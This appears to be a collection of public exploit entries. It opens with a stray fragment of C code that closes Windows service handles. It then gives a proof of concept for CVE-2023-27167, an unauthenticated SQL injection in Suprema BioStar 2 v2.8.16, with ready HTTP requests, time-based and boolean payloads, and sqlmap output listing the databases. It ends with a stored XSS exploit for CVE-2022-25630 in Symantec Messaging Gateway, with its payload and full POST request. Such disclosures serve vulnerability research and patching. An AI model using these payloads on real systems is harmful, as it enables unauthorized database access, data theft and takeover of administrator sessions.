CloseServiceHandle(serviceHandle);
CloseServiceHandle(scmHandle);
return 0;
}
# Exploit Title: Suprema BioStar 2 v2.8.16 - SQL Injection
# Date: 26/03/2023
# Exploit Author: Yuriy (Vander) Tsarenko (https://www.linkedin.com/in/yuriy-tsarenko-a1453aa4/)
# Vendor Homepage: https://www.supremainc.com/
# Software Link: https://www.supremainc.com/en/platform/hybrid-security-platform-biostar-2.asp
# Software Download: https://support.supremainc.com/en/support/solutions/articles/24000076543--biostar-2-biostar-2-8-16-new-features-and-configuration-guide
# Version: 2.8.16
# Tested on: Windows, Linux
# CVE-2023-27167
## Description
A Boolean-based SQL injection/Time based SQL vulnerability in the page (/api/users/absence?search_month=1) in Suprema BioStar 2 v2.8.16 allows remote unauthenticated attackers to execute remote arbitrary SQL commands through "values" JSON parameter.
## Request PoC #1
'''
POST /api/users/absence?search_month=1 HTTP/1.1
Host: biostar2.server.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: application/json, text/plain, */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
content-type: application/json;charset=UTF-8
content-language: en
bs-session-id: 207c1c3c3b624fcc85b7f0814c4bf548
Content-Length: 204
Origin: https://biostar2.server.net
Connection: close
Referer: https://biostar2.server.net/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
{"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":[{"column":"user_group_id.id","operator":2,"values":["(select*from(select(sleep(4)))a)",4840,20120]}],"orders":[],"total":false}}
'''
Time based SQL injection (set 4 – response delays for 8 seconds).
'''
## Request PoC #2
'''
POST /api/users/absence?search_month=1 HTTP/1.1
Host: biostar2.server.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: application/json, text/plain, */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
content-type: application/json;charset=UTF-8
content-language: en
bs-session-id: 207c1c3c3b624fcc85b7f0814c4bf548
Content-Length: 188
Origin: https://biostar2.server.net
Connection: close
Referer: https://biostar2.server.net/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
{"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":[{"column":"user_group_id.id","operator":2,"values":["1 and 3523=03523",4840,20120]}],"orders":[],"total":false}}
'''
Boolean-based SQL injection (payload “1 and 3523=03523” means “1 and True”, so we can see information in response, regarding user with id 1, which is admin)
'''
## Exploit with SQLmap
Save the request from Burp Suite to file.
'''
---
Parameter: JSON #1* ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: {"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":[{"column":"user_group_id.id","operator":2,"values":["1 and 3523=03523",4840,20120]}],"orders":[],"total":false}}
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: {"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":[{"column":"user_group_id.id","operator":2,"values":["(select*from(select(sleep(7)))a)",4840,20120]}],"orders":[],"total":false}}
---
[05:02:49] [INFO] testing MySQL
[05:02:49] [INFO] confirming MySQL
[05:02:50] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL > 5.0.0 (MariaDB fork)
[05:02:50] [INFO] fetching database names
[05:02:50] [INFO] fetching number of databases
[05:02:54] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[05:02:55] [INFO] retrieved: 2
[05:03:12] [INFO] retrieved: biostar2_ac
[05:03:56] [INFO] retrieved: information_schema
available databases [2]:
[*] biostar2_ac
[*] information schema
'''
# Exploit Title: Symantec Messaging Gateway 10.7.4 - Stored Cross-Site Scripting (XSS)
# Exploit Author: omurugur
# Vendor Homepage: https://support.broadcom.com/external/content/SecurityAdvisories/0/21117
# Version: 10.7.4-10.7.13
# Tested on: [relevant os]
# CVE : CVE-2022-25630
# Author Web: https://www.justsecnow.com
# Author Social: @omurugurrr
An authenticated user can embed malicious content with XSS into the admin
group policy page.
Example payload
*"/><svg/onload=prompt(document.domain)>*
POST /brightmail/admin/administration/AdminGroupPolicyFlow$save.flo
HTTP/1.1
Host: X.X.X.X
Cookie: JSESSIONID=xxxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0)
Gecko/20100101 Firefox/99.0
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 652
Origin: https://x.x.x.x
Referer:
https://x.x.x.x/brightmail/admin/administration/AdminGroupPolicyFlow$add.flo
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
pageReuseFor=add&symantec.brightmail.key.TOKEN=xxx&adminGroupName=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28location%29%3E&adminGroupDescription=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28location%29%3E&adminGroupDescription=&fullAdminRole=true&statusRole=true&statusViewOnly=false&reportRole=true&reportViewOnly=false&policyRole=true&policyViewOnly=false&settingRole=true&settingViewOnly=false&adminRole=true&adminViewOnly=false&submitRole=true&submitViewOnly=false&quarantineRole=true&quarantineViewOnly=false&selectedFolderRights=2&ids=0&complianceFolderIds=1&selectedFolderRights=2&ids=0&complianceFolderIds=10000000
Regards,
Omur UGUR